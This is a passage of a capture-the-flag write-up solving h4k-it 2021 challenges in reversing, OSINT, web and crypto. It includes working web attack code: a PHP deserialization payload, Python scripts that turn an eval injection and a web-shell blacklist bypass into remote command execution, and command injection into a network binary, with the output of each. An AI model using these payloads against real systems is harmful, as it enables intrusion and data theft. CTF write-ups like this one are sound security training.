0x00001213 488955e8 mov qword [var_18h], rdx │ 0x00001217 c645f046 mov byte [var_10h], 0x46 ; 'F' │ 0x0000121b c745fc000000. mov dword [c], 0 │ ┌─< 0x00001222 eb20 jmp 0x1244 ``` We can see some interesting strings and these are the ones we have to pass to the file to get the flag. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/panel_COMPLETE] └─$ ./panel ADMINISTRATOR PANEL :: AUTHOR :: tahaafarooq enter a text : zlvwoioPe~~Z:v_DF WHAT HAVE YOU DONE???? xWHAT HAVE YOU DONE???? oWHAT HAVE YOU DONE???? rWHAT HAVE YOU DONE???? rWHAT HAVE YOU DONE???? iWHAT HAVE YOU DONE???? nWHAT HAVE YOU DONE???? gWHAT HAVE YOU DONE???? YWHAT HAVE YOU DONE???? oWHAT HAVE YOU DONE???? uWHAT HAVE YOU DONE???? rWHAT HAVE YOU DONE???? WWHAT HAVE YOU DONE???? 4WHAT HAVE YOU DONE???? yWHAT HAVE YOU DONE???? OWHAT HAVE YOU DONE???? UWHAT HAVE YOU DONE???? TWHAT HAVE YOU DONE???? ``` Notice the extra characters infront of WHAT HAVE YOU DONE. Those are splitted parts of the flag. ``` h4k-it{xorringYourW4yOUT} ``` ### **Eighth chall: noted** ``` The only thing it does is to make notes and read notes!! nc 20.124.30.27 9007 ``` This chall had only 3 solves. We're given a binary and a server to connect to. Running the file -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ ./noted JUST NOTE WRITER AND READER author:tahaafarooq READ OR WRITE A NOTE : 1 OR 2 1 READING tmp.txt Unable to open file. Something is wrong! zsh: segmentation fault ./noted ``` We can see it's expecting a file called tmp.txt to read contents from. I'll create a file called tmp.txt, add some text and then run it again. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ touch tmp.txt; echo "mug3njutsu" > tmp.txt ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ ./noted JUST NOTE WRITER AND READER author:tahaafarooq READ OR WRITE A NOTE : 1 OR 2 1 READING tmp.txt mug3njutsu ``` So, now it just says READING the file and displays its content. Let's look at the second option WRITE. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ ./noted JUST NOTE WRITER AND READER author:tahaafarooq READ OR WRITE A NOTE : 1 OR 2 2 WRITE CONTENT TO tmp.txt Done ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ cat tmp.txt mug3njutsu ``` It says that it has written something to the file, but the file has the same content. Let's disassemble it using radare -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ r2 -A noted Warning: run r2 with -e io.cache=true to fix relocations in disassembly [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x000010c0]> afl 0x000010c0 1 42 entry0 0x000010f0 4 41 -> 34 sym.deregister_tm_clones 0x00001120 4 57 -> 51 sym.register_tm_clones 0x00001160 5 57 -> 50 sym.__do_global_dtors_aux 0x000010b0 1 6 sym.imp.__cxa_finalize 0x000011a0 1 5 entry.init0 0x00001000 3 23 sym._init 0x000013a0 1 1 sym.__libc_csu_fini 0x000013a4 1 9 sym._fini 0x00001340 4 93 sym.__libc_csu_init 0x000011a5 12 400 main 0x00001030 1 6 sym.imp.puts 0x00001040 1 6 sym.imp.fclose 0x00001050 1 6 sym.imp.strlen 0x00001060 1 6 sym.imp.system 0x00001070 1 6 sym.imp.printf 0x00001080 1 6 sym.imp.fgets 0x00001090 1 6 sym.imp.fopen 0x000010a0 1 6 sym.imp.__isoc99_scanf ``` There's a main function. Looking at that -> Let's look at the flow of the program when option 2 is used. ```bash= │ ││ 0x000012db 488d3dc90d00. lea rdi, str.WRITE_CONTENT_TO_tmp.txt ; 0x20ab ; "WRITE CONTENT TO tmp.txt" ; const char *s │ ││ 0x000012e2 e849fdffff call sym.imp.puts ; int puts(const char *s) │ ││ 0x000012e7 488b15822d00. mov rdx, qword [obj.stdin] ; obj.stdin_GLIBC_2.2.5 │ ││ ; [0x4070:8]=0 ; FILE *stream │ ││ 0x000012ee 488d8500fcff. lea rax, [string] │ ││ 0x000012f5 bee8030000 mov esi, 0x3e8 ; int size │ ││ 0x000012fa 4889c7 mov rdi, rax ; char *s │ ││ 0x000012fd e87efdffff call sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream) │ ││ 0x00001302 488b45f0 mov rax, qword [stream] │ ││ 0x00001306 4889c7 mov rdi, rax ; FILE *stream │ ││ 0x00001309 e832fdffff call sym.imp.fclose ; int fclose(FILE *stream) │ ││ 0x0000130e 488d8500fcff. lea rax, [string] │ ││ 0x00001315 4889c7 mov rdi, rax ; const char *string │ ││ 0x00001318 e843fdffff call sym.imp.system ; int system(const char *string) │ ││ 0x0000131d 488d3da00d00. lea rdi, str.Done ; 0x20c4 ; "Done" ; const char *format │ ││ 0x00001324 b800000000 mov eax, 0 │ ││ 0x00001329 e842fdffff call sym.imp.printf ; int printf(const char *format) ``` We can see it opens the file, then closes it, then this is the fun part, it executes the input string and the exits. Sounds interesting, let's do that -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ ./noted JUST NOTE WRITER AND READER author:tahaafarooq READ OR WRITE A NOTE : 1 OR 2 2 ls WRITE CONTENT TO tmp.txt flag.txt noted tmp.txt Done ``` It now executes the list command, sweet! Let's try that on the server -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ nc 20.124.30.27 9007 2 ls bin dev flag.txt lib lib32 lib64 noted tmp.txt JUST NOTE WRITER AND READER author:tahaafarooq READ OR WRITE A NOTE : 1 OR 2 WRITE CONTENT TO tmp.txt Done ``` Now we can cat flag.txt. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/noted_COMPLETE] └─$ nc 20.124.30.27 9007 2 cat flag.txt h4k-it{IGOOOBRRRRRRRRRR_on_SHELLS} JUST NOTE WRITER AND READER author:tahaafarooq READ OR WRITE A NOTE : 1 OR 2 WRITE CONTENT TO tmp.txt Done ``` Solved. ### **Ninth chall: dis4ss3mble** ``` Do you think you can pull this one off?? ``` We're given a python bytecode file. The interesting thing in the file is this string -> aHR0cHM6Ly9wYXN0ZWJpbi5jb20vNzViZmFqQloK. ``` 13 40 LOAD_GLOBAL 2 (base64) 42 LOAD_METHOD 3 (b64decode) 44 LOAD_FAST 2 (encoded_flag) ``` We can see that the string is base64 encoded, so let's decode that -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/dis4ss3mble_COMPLETE] └─$ echo "aHR0cHM6Ly9wYXN0ZWJpbi5jb20vNzViZmFqQloK" | base64 -d https://pastebin.com/75bfajBZ ``` We get a pastebin link. Here we have a commented key -> # key : gameofhacks which is a rabbithole many fell for xD and yet another base64_encoded string -> NjgzNDZoMmQ2OTc0N24zMjMzMzQzMzVqNjY2cTM0Njc1azYzMzQ3MDc0NTU3MjMzNjQ1bTI0NjE2NDZkMzMzMTcyNjU2NDVoNzM2bDMxMzEzMTZ1Nmk3MzczMzU3ZAo=. Let's decode that -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/dis4ss3mble_COMPLETE] └─$ echo -n "NjgzNDZoMmQ2OTc0N24zMjMzMzQzMzVqNjY2cTM0Njc1azYzMzQ3MDc0NTU3MjMzNjQ1bTI0NjE2NDZkMzMzMTcyNjU2NDVoNzM2bDMxMzEzMTZ1Nmk3MzczMzU3ZAo=" | base64 -d 130 ⨯ 68346h2d69747n323334335j666q34675k63347074557233645m2461646d33317265645h736l3131316u6i7373357d ``` Now we have a hex string. I'll decode that on this site -> <a href="https://onlinehextools.com/convert-hex-to-ascii">onlinehextools</a>  You notice that some hex characters were not able to be decoded properly and so there's that weird print of the characters. I'll first correct the obvious parts of the flag since we know the flag format and in doing this i noticed two things. First thing is that, for the incorrect hex char, only the second part of its char is incorrect and second thing is, if the incorrect char was let's say an alphabet, the correct version is also only an alphabet, it can't be a number.  This is much cleaner. So now we just have figure what chars should be put where. So, i went to a similar site -> <a href="https://onlinehextools.com/convert-ascii-to-hex">onlinehextools</a> but this one converts ascii to hex instead. For each bad char, i encoded all possible chars that could replace that incorrect one and then added the char manually to see if the flag makes sense. Here are my notes -> ``` 5j: 5a -> Z 5b -> [ 5c -> \ 5d -> ] 5f -> _ 6l: 6a -> j 6b -> k 6c -> l 6d -> m 6e -> n 6f -> o ``` So, eventually i ended up with this -> 68 34 6b 2d 69 74 7b 32 33 34 33 5f 66 6c 34 67 5f 63 34 70 74 55 72 33 64 5f 24 61 64 6d 33 31 72 65 64 5f 73 6b 31 31 31 6c 6c 73 73 35 7d. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/dis4ss3mble_COMPLETE] └─$ echo -n "68 34 6b 2d 69 74 7b 32 33 34 33 5f 66 6c 34 67 5f 63 34 70 74 55 72 33 64 5f 24 61 64 6d 33 31 72 65 64 5f 73 6b 31 31 31 6c 6c 73 73 35 7d" | xxd -r -p h4k-it{2343_fl4g_c4ptUr3d_$adm31red_sk111llss5} ``` Solved. ## OSINT CHALLS ### **First chall: Winged companion** ``` My name is derived from a mythical winged greek creature. I have the ability to infiltrate your device and have access to your SMS, Emails , Whatsapp, Photos And Videos, GPS Data , Activate Microphone, Record calls, Calendar and Contact Books, Who Am I?? Flag Format : h4k-it{xxxxxxxx} ``` Pretty straight forward. You can just google the first few lines and you get the answer as Pegasus. ### **Second chall: GameOfHacks** ``` How many times was I (game of hacks) hosted , and when was the first time I made an entrace to the cybersecurity community? Flag Format : h4k-it{numberoftimehosted-yearoffirstentrace} ``` Since i've been on this CTF platform from the very beginning, it was easy to answer this. numberoftimehosted -> 2 and yearoffirstentrance -> 2020. Here's my writeup for previous one bytheway -> <a href="https://hackmd.io/@codaholikid/h4k-it-ctf">h4k-it-ctf-2020</a> ### **Third chall: From Zero To Hero** ``` I was the most wanted man for various computer and communication hacks in my days and now I am a cybersecurity expert , who am I? ``` This was also pretty straight forward. We all know the guy lmao. Kevin Mitnick. ### **Fourth chall: tahaafarooq** ``` Can you find the secret tahaafarooq hides? He always brags about this social media network where he shows off his pojects! ``` I used sherlock to search for that username across platforms. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/tahaafarooq_COMPLETE] └─$ python3 /opt/sherlock/sherlock/sherlock.py tahaafarooq [*] Checking username tahaafarooq on: [+] BitBucket: https://bitbucket.org/tahaafarooq/ [+] Docker Hub: https://hub.docker.com/u/tahaafarooq/ [+] Duolingo: https://www.duolingo.com/profile/tahaafarooq [+] Facebook: https://www.facebook.com/tahaafarooq [+] GitHub: https://www.github.com/tahaafarooq [+] HackerOne: https://hackerone.com/tahaafarooq [+] Instagram: https://www.instagram.com/tahaafarooq [+] Medium: https://medium.com/@tahaafarooq [+] Periscope: https://www.periscope.tv/tahaafarooq/ [+] Pinterest: https://www.pinterest.com/tahaafarooq/ [+] Reddit: https://www.reddit.com/user/tahaafarooq [+] Replit.com: https://replit.com/@tahaafarooq [+] Telegram: https://t.me/tahaafarooq [+] Tinder: https://www.gotinder.com/@tahaafarooq [+] Twitch: https://www.twitch.tv/tahaafarooq [+] Twitter: https://twitter.com/tahaafarooq [+] babyblogRU: https://www.babyblog.ru/user/info/tahaafarooq ``` The interesting one here is the github. One of his repositories is his blog -> https://github.com/tahaafarooq/tahaafarooq.github.io. Browsing to tahaafarooq.github.io we get -> No flag here! This is interesting. I cloned his repository to have a look at this commits. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/tahaafarooq_COMPLETE/tahaafarooq.github.io] └─$ git log commit d9d4f128fc23c7a56ef5c841847a788a166b4204 (HEAD -> main, origin/main, origin/HEAD) Author: Tahaa Aqil <49201347+tahaafarooq@users.noreply.github.com> Date: Sun Sep 19 14:33:57 2021 +0300 Update README.md commit b200265b0a7c79ca17b15fb905bfb70f03ca1286 Author: Tahaa Aqil <49201347+tahaafarooq@users.noreply.github.com> Date: Sun Sep 19 14:32:27 2021 +0300 Create index.html commit d52ddcded1901d8ef67b8d22179c8d84bb68f17e Author: Tahaa Aqil <49201347+tahaafarooq@users.noreply.github.com> Date: Sun Sep 19 14:27:30 2021 +0300 Update README.md commit b82f9612736cdd17f039f918a28a27897675a211 Author: Tahaa Aqil <49201347+tahaafarooq@users.noreply.github.com> Date: Sun Sep 19 14:27:12 2021 +0300 Update README.md commit dd8c25f0ba32d21975f55d57be3b978a120170ff Author: Tahaa Aqil <49201347+tahaafarooq@users.noreply.github.com> Date: Sun Sep 19 14:25:52 2021 +0300 Initial commit ``` I then looked at the first commit since it's timestamp is 14:33:57 which was updated last. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/tahaafarooq_COMPLETE/tahaafarooq.github.io] └─$ git show d9d4f128fc23c7a56ef5c841847a788a166b4204 commit d9d4f128fc23c7a56ef5c841847a788a166b4204 (HEAD -> main, origin/main, origin/HEAD) Author: Tahaa Aqil <49201347+tahaafarooq@users.noreply.github.com> Date: Sun Sep 19 14:33:57 2021 +0300 Update README.md diff --git a/README.md b/README.md index 1b01480..8d93529 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ # tahaafarooq.github.io Just my personal blog -h4k-it{w0w_wh0_kn3w_y0u_g00t_l33t5killS} +nothing to read here ``` Easy. ### **Fifth chall: H4K-IT 2021** ``` @tahaafarooq#9056 , mentioned something interesting ! I think you should check it out! #ROAD TO MAIN EVENT ``` This chall had only 3 solves. From the description, it points us to the discord server. Note the hashtag -> ROAD TO MAIN EVENT. In the announcements channel, you'll notice that he posted one image twice.  And in the second image, he placed the same hashtag as the one in the description. I downloaded that image to have a closer look. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/h4k_it_2021_COMPLETE] └─$ binwalk event_banner.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, EXIF standard 12 0xC TIFF image data, big-endian, offset of first image directory: 8 ``` Nothing too interesting here since there isn't compressed data. So, i decided to use stegseek instead. But funny thing, tahaa is just an insane lad. He'll use a password from a wordlist that you've never heard about lol!!! ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/h4k_it_2021_COMPLETE] └─$ stegseek event_banner.jpg /usr/share/wordlists/rockyou.txt StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [i] Progress: 99.93% (133.5 MB) [!] error: Could not find a valid passphrase. ``` Stegseek with the rockyou wordlist doesn't work and i know this is where many people were thrown off. I decided to yolo this part with a for loop, that was going to try every wordlist in Seclists/Passwords directory. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/h4k_it_2021_COMPLETE] └─$ for i in $(ls /usr/share/wordlists/SecLists/Passwords/ | grep .txt); do stegseek event_banner.jpg /usr/share/wordlists/SecLists/Passwords/$i; done 1 ⨯ StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [i] Found passphrase: "ohmnamah23" [i] Original filename: "flag.txt". [i] Extracting to "event_banner.jpg.out". ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/h4k_it_2021_COMPLETE] └─$ cat event_banner.jpg.out h4k-it{britishcouncil} ``` Done! ### **Sixth chall: Internet Puzzle Mystery** ``` I was never solved 5696bf1ee6183e26008b937f.jfif Flag Format : h4k-it{xxxxx xxxx} ``` We're given a jfif file and opening it, we see an interesting image.  I solved this a minute after it was released and the author wondered how i solved it that fast. Well, you can do a google reverse image search here -> <a href="https://www.google.com/imghp?hl=en">Reverse image</a>  Too easy. ## WEB CHALLS ### **First chall: sergent** ``` You aren't strong enough to face our sergent !! http://20.124.30.27:9003/ ``` Going to that website, we land on a login page. Tried the basic authentication creds and all little of sql injection but nothing worked. Checked the page source and saw an interesting file -> main.js. Clicking it, we get some javascript obfuscated code. So i went to <a href="https://lelinhtinh.github.io/de4js/">de4js</a> that automatically deobfuscated that. ```javascript= n(_0x4a3023, _0x2db852) { var _0x26b958 = _0x1655, _0x5c2f20 = _0x4a3023(); while (!![]) { try { var _0x28573e = parseInt(_0x26b958(0x7d)) / 0x1 + -parseInt(_0x26b958(0x79)) / 0x2 * (parseInt(_0x26b958(0x7e)) / 0x3) + parseInt(_0x26b958(0x78)) / 0x4 + -parseInt(_0x26b958(0x72)) / 0x5 * (parseInt(_0x26b958(0x7f)) / 0x6) + parseInt(_0x26b958(0x73)) / 0x7 * (parseInt(_0x26b958(0x74)) / 0x8) + parseInt(_0x26b958(0x7a)) / 0x9 + -parseInt(_0x26b958(0x6c)) / 0xa; if (_0x28573e === _0x2db852) break; else _0x5c2f20['push'](_0x5c2f20['shift']()); } catch (_0x2556ca) { _0x5c2f20['push'](_0x5c2f20['shift']()); } } }(_0x566c, 0x77935)); function _0x566c() { var _0x4fb691 = ['password', '2313255AVntnR', '1577471RCbgYo', '8uLiVTp', 'value', 'getElementsByClassName', 'innerHTML', '3278280IRmHjr', '4YDPHXA', '1734894tRUueT', 'wrong password or username', 'h4k-it@2021', '196215fZxMmA', '572322cwglGd', '6QHCTid', '999240CPQwPg', 'FUSC4T3D_JAVASCRIPT_D0NEE!!}', 'flag', 'loginform', 'username']; _0x566c = function () { return _0x4fb691; }; return _0x566c(); } function _0x1655(_0x310415, _0x22b809) { var _0x566c18 = _0x566c(); return _0x1655 = function (_0x1655ee, _0x4c7690) { _0x1655ee = _0x1655ee - 0x6c; var _0x1bc8f7 = _0x566c18[_0x1655ee]; return _0x1bc8f7; }, _0x1655(_0x310415, _0x22b809); } function authorize() { var _0x191f56 = _0x1655; alert('processing'); var _0x2bff27 = document[_0x191f56(0x6f)][_0x191f56(0x70)]['value'], _0x30bf5b = document['loginform'][_0x191f56(0x71)][_0x191f56(0x75)], _0x1f72eb = _0x191f56(0x7c), _0x519871 = _0x191f56(0x7c); if (_0x2bff27 == _0x1f72eb && _0x30bf5b == _0x519871) return document[_0x191f56(0x76)](_0x191f56(0x6e))[_0x191f56(0x77)] = 'h4k-it{DE0B', document[_0x191f56(0x76)](_0x191f56(0x6e))[_0x191f56(0x77)] = _0x191f56(0x6d), ![]; else document[_0x191f56(0x76)]('flag')[_0x191f56(0x77)] = _0x191f56(0x7b); } ``` From the code, the first part of the flag is -> h4k-it{DE0B and the second part is -> FUSC4T3D_JAVASCRIPT_D0NEE!!} -> h4k-it{DE0BFUSC4T3D_JAVASCRIPT_D0NEE!!} ### **Second chall: maze** ``` This should be as close to easy as you can get ! I hope you did your best with Sergent! ``` I struggled with this challenge for some time. When you visit the website, you get an input section with a submit button. I then submitted an input to notice that it adds zero at the beginning of the first input and then concatinates all other inputs. This was definitely an insecure serialization vulnerability. Looking at the cookies, we find a cookie named list -> a%3A4%3A%7Bi%3A0%3Bs%3A2%3A%22ls%22%3Bi%3A1%3Bs%3A2%3A%22ls%22%3Bi%3A2%3Bs%3A11%3A%22mug3njutsu%22%3Bi%3A3%3Bs%3A8%3A%22whatever%22%3B%7D. Decoding this gives -> a:4:{i:0;s:2:"ls";i:1;s:2:"ls";i:2;s:11:"mug3njutsu";i:3;s:8:"whatever";}. So, we now confirm that the input is being serialized. Viewing the page using inspector, got some interesting php code. ```php= #try to read flag.php Class ILovePHP{ public function __toString() { return highlight_file($this->source,true); } } ``` The code suggests that there is a php file called flag.php that we should read to get the flag. It gives us some insight on how the data is being serialized. I created some simple php script that will serialize an object pointing it to read flag.php. ```php= <?php Class ILovePHP{ public function __toString() { return highlight_file($this->source, true); } } $foo = new ILovePHP(); $foo->source = 'flag.php'; $bar = []; $bar[] = $foo; $m = serialize($bar); echo urlencode($m); ?> ``` Running this creates this serialized object -> a%3A1%3A%7Bi%3A0%3BO%3A8%3A%22ILovePHP%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D. Replacing the list cookie with this and reloading the page, we get the flag. ```php= <?php die('Flag is here! Try to read it!'); $flag = 'h4k-it{0p3n_y0ur_eyesss_and_y0u_w1ll_s33}'; ?> ``` ### **Third chall: lave** ``` PIECE OF CAKE , WITH A BERRY ON TOP! http:/20.124.30.27:9005/ ``` Visiting the website, we get a blank webpage. Viewing the page source -> ```php= <!-- $str=@(string)$_GET['str']; blackListFilter($black_list, $str); eval('$str="'.addslashes($str).'";'); --> ``` From the code, we can see that we can do a get request. Then the eval function evaluates the input and then any sort of quotes are gotten rid of. So you can't pass your string to the get request with quotes, it won't work. Decided to use the system and the base64_decode function in php to make the bypass a little easier. Then i made a simple python script to make it easier to interact with it. ```python= #!/usr/bin/python3 # @author: mug3njutsu from base64 import b64encode import requests url = "http://20.124.30.27:9005/" while 1: command = input("$ ").encode('utf-8') new = b64encode(command).decode() if len(command.split()) == 1: new = new[0:-1] params = {'str':'${${system(base64_decode(%s))}}'%new} r = requests.get(url, params=params) print("\n".join(r.text.strip().split("\n")[0:-5])) ``` Running this -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/lave_COMPLETE] └─$ python3 a.py $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ ls index.php $ ls ../../../ bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var $ cat /flag h4k-it{back_to_b4sics_with_eval} ``` Sweet! ### **Fourth chall: bypass** ``` Our web developer at BlackTek has decided to make some sort of a web shell that I dont believe to be as secure as he claims , he says he will be using it for development in the server without loggin into the server , and I think attackers might as well use that chance to get inside but he is just too much to debate with , Prove him wrong! ``` Visiting the website, you get some bold text saying that there's nothing for you there. Nothing interesting as well when you view the page source. Decided to check for robots.txt and luckily found some interesting data. ```htmlembedded= Dissalow : * - testing_webshell.php For more information read /flag.txt ``` We have a php file and we're hinted to try read /flag.txt. Accessing the file, we get a webpage with an input field and an exec button. This is what we'll use to gain RCE. But if you try running commands like ls, cat, etc, they don't work and best guess is that they are blacklisted. The easiest way to bypass this is to echo a base64_encoded string, decode it then pipe it to bash. I'll use a similar script to the previous challenge to easen this process. ```python= #!/usr/bin/python3 # @author: mug3njutsu from base64 import b64encode import requests url = "http://20.124.30.27:9004/testing_webshell.php" while 1: command = input("$ ").encode('utf-8') new = b64encode(command).decode() params = {'cmd':'echo -n "%s" | base64 -d | bash'%new} r = requests.get(url, params=params) print("\n".join(r.text.split("<p>")[1].split("\n")[0:-4])) ``` Running this -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/bypass_COMPLETE] └─$ python3 a.py $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ ls index.html robots.txt testing_webshell.php $ ls / bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var $ cat /flag.txt h4k-it{An0th3r_PHP_WEB_APP} ``` Nice and easy! ## CRYPTO CHALLS ### **First chall: ThreeTwo** ``` do you know where the base is at? ``` We're given a file with an interesting string -> NA2GWLLJOR5XG33NGNPWEYLTMUZTEX3JONPWUVLTKRPXONDUONPW4MZTMQZWI7I. This was base32 encoding and <a href="https://gchq.github.io/CyberChef/#recipe=From_Base32('A-Z2-7%3D',true)&input=TkEyR1dMTEpPUjVYRzMzTkdOUFdFWUxUTVVaVEVYM0pPTlBXVVZMVEtSUFhPTkRVT05QVzRNWlRNUVpXSTdJ">cyberchef</a> decoded the string to -> h4k-it{som3_base32_is_jUsT_w4ts_n33d3d} ### **Second chall: babyenc** ``` symmetric encryption is probably the best way to send secret messages, prove me wrong!? ``` We're given a file with two interesting strings -> ``` TxX2xQugpL2IPqACxsNq86k9Rk0fxlSYMpoD-wSMlQ0= gAAAAABhS7WlkR4URDpTNt_bR_0-w7rwcY5A4a_z2ybMLuJY-UHuOsMDmLnabJmfyHVQsmiyXqvrht2hcnF_1z-zaNewoti9pTCEWvmXuB3xMTrnj5xgsfTG8bE2KwrTNptec1HJrknO ``` If you've done many CTFs, it's easy to tell that it's Fernet encoding. I made a simple python script to decode this. ```python= #!/usr/bin/python3 # @author: mug3njutsu from cryptography.fernet import Fernet cipher = b"gAAAAABhS7WlkR4URDpTNt_bR_0-w7rwcY5A4a_z2ybMLuJY-UHuOsMDmLnabJmfyHVQsmiyXqvrht2hcnF_1z-zaNewoti9pTCEWvmXuB3xMTrnj5xgsfTG8bE2KwrTNptec1HJrknO" key = b"TxX2xQugpL2IPqACxsNq86k9Rk0fxlSYMpoD-wSMlQ0=" f = Fernet(key) flag = f.decrypt(cipher).decode() print(flag) ``` Running this -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/babyenc_COMPLETE] └─$ python3 ape.py h4k-it{symmetric_3ncrypt10n_1s_FUN!!} ``` ### **Third chall: bee** ``` We received intel that , the terrorists have been communicating in a secret cipher of some sort, you are our best chance at stopping this , decipher this message and see what it says! we might be saving millions! ``` Cryptic message -> ``` Hotel Four Kilo - India Tango _ Sierra Zero Mike Echo Echo Sierra Papa Yankee Mike Oscar Victor Echo Sierra Whiskey One Tango Hotel Tango Hotel Three Sierra Papa Echo Lima Lima India November Golf _ ``` Since i didn't know what type of cipher this is, i quickly went to <a href="https://www.dcode.fr/cipher-identifier">cipher_identifier</a> to see what type of cipher it is. It was suggested to be NATO Phonetic Alphabet. Decoded the message here <a href="https://www.dcode.fr/nato-phonetic-alphabet">nato_phonetic_alphabet_decode</a>. Decodes to -> H 4 K I T S 0 M E E S P Y M O V E S W 1 T H T H 3 S P E L L I N G Let's clean that up -> h4k-it{s0meespymovesw1thth3spelling} ### **Fourth chall: RSA101** ``` I am easy! ``` We're given a file containing a ciphertext(c), public exponent(e) and a modulus(N). I took the easier road with this one and that is running rsactftool. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/rsa-101_COMPLETE] └─$ python3 /opt/RsaCtfTool/RsaCtfTool.py -n 48564396752059338791464352725210493148212425902751190745668164451763507023284970474595680869078726765719920168392505794415687815488076204724659643390252172928332322944711949999326843460702414647825442748821062427474599006915155109396213406624079900714394311217571510958430682853948004734434233860146109894977 -e 31337 --uncipher 1224384818505999995756224059681332072553897825844504399932778267733396613592114623636043522676975245457642191737410926029535630102529388502379072967569684391635695202150116720712881555448283497887292300119931627710836317412080781761291412560326513144750348718614726770436539889889035883975185985843646381929 private argument is not set, the private key will not be displayed, even if recovered. [*] Testing key /tmp/tmpv4_zkbba. [*] Performing smallq attack on /tmp/tmpv4_zkbba. [*] Performing mersenne_primes attack on /tmp/tmpv4_zkbba. 27%|███████████████████████████████████▍ | 14/51 [00:00<00:00, 131365.23it/s] [*] Performing system_primes_gcd attack on /tmp/tmpv4_zkbba. 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7007/7007 [00:00<00:00, 337635.57it/s] [*] Performing factordb attack on /tmp/tmpv4_zkbba. [*] Attack success with factordb method ! Results for /tmp/tmpv4_zkbba: Unciphered data : HEX : 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000124ee317928c605ed8f8c63e0da3fcbd7ac80285 INT (big endian) : 104521074510511612369521151219511411552333333125 INT (little endian) : 93403410425897835844921145969499255846836662802932130246610060025009197461497938365849460072183381369681807767291844462399214716302575292986152141968069303779058941012264945668954541601741347945796047173088331200397886605090339005984067280335426637265712981441705272419955770143034849671542747175023217213440 utf-16 : 丒៣貒幠㻆ꌍ뷼졺蔂 STR : b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12N\xe3\x17\x92\x8c`^\xd8\xf8\xc6>\r\xa3\xfc\xbdz\xc8\x02\x85' ``` So, you notice that we didn't get the flag in plaintext. And if you look keenly at the (Big Endian) value, you'll notice that it's actually ascii encoded. Made a simple python script to decode this. ```python= #!/usr/bin/python3 # @author: mug3njutsu char = [104, 52, 107, 45, 105, 116, 123, 69, 52, 115, 121, 95, 114, 115, 52, 33, 33, 33, 125] flag = "".join(map(chr, char)) print(flag) ``` Running this -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/rsa-101_COMPLETE] └─$ python3 a.py h4k-it{E4sy_rs4!!!} ``` Easy. ### **Fifth chall: easy decode** ``` 